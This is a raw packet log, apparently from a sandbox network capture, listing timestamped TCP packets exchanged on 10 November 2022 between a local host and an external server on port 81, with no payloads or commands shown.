Nov 10, 2022 11:43:11.542337894 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.542346001 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542381048 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542404890 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.542416096 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542452097 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542488098 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542490959 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.542521954 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542551994 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.542558908 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542596102 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542620897 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.542630911 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542665005 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542690039 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.542701006 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542733908 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542758942 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.542768955 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542804003 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542829037 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.542838097 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542912006 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542934895 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.542951107 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.542984962 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.543021917 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.543059111 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.543093920 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.543128967 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.543157101 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.543157101 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.543157101 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.543164968 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.543201923 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.543231010 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.543617010 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.545037985 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545080900 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545118093 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545152903 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.545154095 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545191050 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545227051 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545229912 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.545262098 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545291901 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.545298100 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545332909 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545357943 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.545367956 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545403957 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545438051 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.545439959 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545475006 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545505047 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.545511007 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545546055 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545571089 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.545582056 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545618057 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545640945 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.545653105 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545689106 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545708895 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.545722961 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545758963 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545793056 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545799971 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.545828104 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545854092 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.545861959 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545896053 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545931101 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.545968056 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.546006918 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.546025038 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.546042919 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.546077967 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.546103954 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.546114922 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.546152115 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.546190023 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.546226025 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.546262980 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.546269894 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.546269894 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.546298981 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.546334028 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.546489000 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.552375078 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.552481890 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.552594900 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.554369926 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.554409981 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.554497957 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.580552101 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.580610991 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.580651999 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.580693960 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.580735922 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.580776930 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.580818892 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.580861092 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.580866098 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.580867052 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.580867052 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.580903053 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.580946922 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.580995083 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581006050 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.581024885 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.581037998 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581079960 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581120014 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.581123114 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581165075 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581182003 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.581208944 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581250906 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581265926 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.581295013 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581336021 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581351995 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.581377983 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581423998 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581437111 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.581465960 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581507921 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581549883 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581557989 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.581593037 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581618071 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.581635952 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581676006 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581693888 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.581717014 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581759930 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581779957 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.581801891 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581844091 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581866980 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.581885099 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581927061 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.581939936 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.581969023 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582010984 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582032919 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.582053900 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582096100 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582132101 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.582138062 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582180023 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582196951 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.582220078 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582262993 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582277060 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.582304955 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582345963 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582361937 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.582386971 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582427979 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582442999 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.582468987 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582510948 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582535982 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.582552910 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582596064 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582613945 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.582653046 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582694054 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582712889 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.582736015 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582778931 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582794905 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.582819939 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582861900 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582900047 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.582946062 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.582988024 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583018064 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.583031893 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583076000 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583091974 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.583117962 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583158970 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583174944 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.583200932 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583242893 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583257914 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.583283901 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583327055 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583343029 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.583370924 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583412886 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583429098 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.583456039 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583498955 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583518982 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.583542109 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583584070 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583599091 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.583625078 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583667040 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583686113 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.583709002 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583753109 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583764076 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.583795071 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583836079 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583849907 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.583884954 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583939075 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.583956003 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.583982944 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584028959 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584058046 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.584072113 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584116936 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584132910 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.584157944 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584198952 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584216118 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.584239006 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584280014 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584299088 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.584321022 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584362984 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584404945 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584405899 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.584448099 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584471941 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.584490061 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584531069 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584549904 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.584573030 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584614992 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584634066 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.584657907 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584698915 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584722042 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.584742069 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584784031 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584799051 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.584825039 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584867001 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584903002 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.584908009 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584948063 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.584980011 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.584990978 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.585033894 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.585048914 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.585076094 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.585119009 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.585134029 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.585160971 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.585202932 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.585216045 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.585246086 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.585287094 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.585304976 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.585328102 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.585369110 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.585391045 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.585412025 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.585469961 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.593967915 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.594007969 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.594034910 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.594060898 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.594086885 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.594121933 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.594125032 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.594125032 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.594125032 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.594125032 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.594125032 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.594162941 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.594168901 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.594202995 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.594209909 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.594249010 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.598421097 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.612004995 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612036943 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612056017 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612075090 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612095118 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612116098 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612134933 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612154961 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612174034 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612193108 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612214088 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612231970 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612251997 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612271070 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612282991 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.612282991 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.612282991 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.612292051 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612312078 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612330914 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612349033 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612369061 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612386942 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612407923 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612426043 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612445116 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612447977 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.612463951 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612483025 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612488985 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.612502098 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612521887 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612529993 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.612540960 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612560987 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612579107 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612585068 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.612593889 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612607002 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612621069 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612633944 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612648010 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612660885 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612674952 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612693071 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612711906 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612730026 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612750053 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612761021 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.612771988 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612791061 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612795115 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.612812996 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612827063 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.612839937 CET	81	49172	206.81.11.20	192.168.2.22
